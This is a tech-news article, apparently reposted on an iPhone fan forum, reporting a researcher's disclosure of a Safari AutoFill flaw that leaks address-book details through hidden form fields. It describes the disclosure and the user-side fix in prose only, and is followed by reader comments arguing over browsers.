• Your favorite

    Apple

    ,

    iPhone

    ,

    iPad

    ,

    iOS

    ,
    Jailbreak
    , and
    Cydia
    site.
  • Researcher Finds Safari AutoFill Security Hole


    A vulnerability in Apple's Safari browser exposing users' personal information has been revealed by a security researcher. Jeremiah Grossman of White Hat Security, Inc. discovered that an AutoFill feature - which is enabled by default in Safari version 4 and 5 - can be used to obtain a user's name, company, address, and email, as well as the content of other fields that begin with a letter. The weakness also exists in earlier versions of Microsoft's Internet Explorer. Grossman has a proof-of-concept web page up that will let users check to see if they are vulnerable.

    Basically, the exploit involves using JavaScript to simulate keypresses from A to Z on hidden fields with titles like “Name,” “Company,” “Address,” and “Email.” When the "AutoFill using info from my Address Book card" default option is left enabled, Safari auto-completes the field and the info is sent to the attacker. As Grossman states in his blog post describing the vulnerability, "the entire process takes mere seconds," and enables attackers to capture information for further mayhem, "including email spam, (spear) phishing, [and] stalking." Getting creative, Grossman even notes the possibility for "blackmail if a user is de-anonymized while visiting objectionable online material," presumably with a bogus site containing adult content which would include the AutoFill exploit. The vulnerability only exists if the first character in the field is a letter; numbers won't work.

    Grossman says he reported the vulnerability to Apple on June 17, in accordance with standing policy among good-guy hackers to let a company fix its flaws before making them public. However, he says, Apple hasn't responded in any way at all, other than an automated acknowledgement that his email was received. After a follow-up message, Grossman says he got no response whatsoever, "human or robotic.” He's releasing this information now to warn users about the vulnerability, so they can protect themselves by disabling the default feature.

    Grossman is set to give a talk at the Black Hat Technical Security Conference next week on vulnerabilities enabled by default in the four most common browsers. He's also found weaknesses in Firefox and Chrome that can reveal saved passwords, as well as a "mass cookie deleter" that can wipe out all of a user's cookies in a matter of seconds.

    Source: AppleInsider
    This article was originally published in forum thread: Researcher Finds Safari AutoFill Security Hole started by Paul Daniel Ash View original post
    Comments 39 Comments
    1. sziklassy's Avatar
      sziklassy -
      I love that "caution bad idea" sign ROFL
    1. tudtran's Avatar
      tudtran -
      Firefox and chrome is so much better safari.
    1. flintoff's Avatar
      flintoff -
      Good that I don't use safari
    1. gthugballin's Avatar
      gthugballin -
      nice it worked lol... to bad i have nothing worth stealing.. hack away
    1. dsg's Avatar
      dsg -
      Quote Originally Posted by tudtran View Post
      Firefox and chrome is so much better safari.
      there is just something about firefox I don't like, I can't figure out what it is either, I can't coment on chrome because I haven't really used it
    1. Cer0's Avatar
      Cer0 -
      I hated chrome. It just bothered me to much. Firefox I don't mind.
    1. iStoner's Avatar
      iStoner -
      chrome is the shizznit
      Quote Originally Posted by cerote View Post
      I hated chrome. It just bothered me to much. Firefox I don't mind.
    1. Cer0's Avatar
      Cer0 -
      I am sure it is nice but like DSG I can't pin-point the problem I have with it.
    1. qumahlin's Avatar
      qumahlin -
      Who the hell uses Safari? I love Apple, but bottom line is Safari is **** compared to Chrome and Firefox. It's only redeeming feature is the activity window and the way it handles searching by popping the words out of the page and dimming the rest of the text.

      Most companies don't even code with Safari in mind and yes while its a webkit browser, there are slight differences as pages will not look 100% the same in Chrome / Safari.
    1. shaldi's Avatar
      shaldi -
      who i am compare to them intelligent or spy or agent. im just a normal person. they can see my data or email or what ever they want inside my iphone. i have nothing to hide, n no secret of life. hehehe.
    1. santacruzlocal's Avatar
      santacruzlocal -
      Hmm ... Is Apple and Windows on a level playing field?
    1. GranDaddyPurp's Avatar
      GranDaddyPurp -
      Hmm firefox and chrome also has weaknesses. That's nothing new in web browsers.
    1. sdjmchattie's Avatar
      sdjmchattie -
      Quote Originally Posted by qumahlin View Post
      Who the hell uses Safari? I love Apple, but bottom line is Safari is **** compared to Chrome and Firefox. It's only redeeming feature is the activity window and the way it handles searching by popping the words out of the page and dimming the rest of the text.

      Most companies don't even code with Safari in mind and yes while its a webkit browser, there are slight differences as pages will not look 100% the same in Chrome / Safari.
      If you reckon. Safari gets 100% on the acid3 test so it conforms to web standards more than most every other browser. Including the most used of all, Firefox
    1. Tyronal's Avatar
      Tyronal -
      This is a piffle in comparison to the biggest security vulnerability EVERY computer browser faces. Flash. All you have to do is type flash and vulnerabilities in a search engine and the truths will scare your pants off. After reading this stuff you'd never use it ever again. They say they fix vulnerabilities but just patch them and it still gives hackers (or the FBI) FULL access to everything on your computer. I understand it's necessity but boy it's a big gaping hole that Adobe neglects year on year. I'm glad they've made the linux version almost unusable, coz I don't, now.
    1. Antman217's Avatar
      Antman217 -
      Quote Originally Posted by tudtran View Post
      Firefox and chrome is so much better safari.
      Not on mac. Safari is superior to all web browsers on mac. Firefox is very similar in speed to safari and I have it installed just in case safari can do a certain thing but safari has some nice features like top sites and the new article reader that firefox does have plug INS for but they don't really match up the same way safari does it. Chrome is actually slower than safari and firefox on my mac for some reason. On windows I get a totally different experience. On windows chrome is freakin awesome and I'm using bootcamp so it's not the computer itself it seems to be the operating system but I use mac way more so in sticking to safari. Apple is pretty fast on the updates though so it shouldn't be long be. They are pretty busy with the whole iPhone 4 reception thing though
    1. macsoldier's Avatar
      macsoldier -
      Its only the beginnig

      Its only the beginning
    1. dale1v's Avatar
      dale1v -
      Quote Originally Posted by Antman217 View Post
      Not on mac. Safari is superior to all web browsers on mac. Firefox is very similar in speed to safari and I have it installed just in case safari can do a certain thing but safari has some nice features like top sites and the new article reader that firefox does have plug INS for but they don't really match up the same way safari does it. Chrome is actually slower than safari and firefox on my mac for some reason. On windows I get a totally different experience. On windows chrome is freakin awesome and I'm using bootcamp so it's not the computer itself it seems to be the operating system but I use mac way more so in sticking to safari. Apple is pretty fast on the updates though so it shouldn't be long be. They are pretty busy with the whole iPhone 4 reception thing though
      I doubt it's the OS. Apple software is generally awful on Windows.

      I tried to use Safari, but the address bar and UI in general just leaves too much to be desired.
    1. tomcooldrummer's Avatar
      tomcooldrummer -
      Well this affected me. I turned on autofill no shorter than a few days ago and it has already caused someone to hack my facebook account. As soon as i read this artical I went onto my usual sites and it immediately told me that someone logged onto my account in germany so I turned autofill off and changed my password. Thankyou ModMyi!
    1. Tyronal's Avatar
      Tyronal -
      Quote Originally Posted by tomcooldrummer View Post
      Well this affected me. I turned on autofill no shorter than a few days ago and it has already caused someone to hack my facebook account. As soon as i read this artical I went onto my usual sites and it immediately told me that someone logged onto my account in germany so I turned autofill off and changed my password. Thankyou ModMyi!
      You must be the most unluckiest person on the planet. In just a few days all your usual accounts, hacked. That is incredible. Considering this was just a warning of a vulnerability not actual proof that hackers were actually doing this, and the fact it only accesses information from a Mac's address book, not passwords, your story is just amazing. From what I know about Macs is their passwords are stored in a thing called keychain, not address book and you have to allow as admin of your computer for safari to access passwords. BTW, I'd check for malware man, sounds like you've been compromised. Your story doesn't hold water so I wouldn't sleep well just by turning off autofill from address book.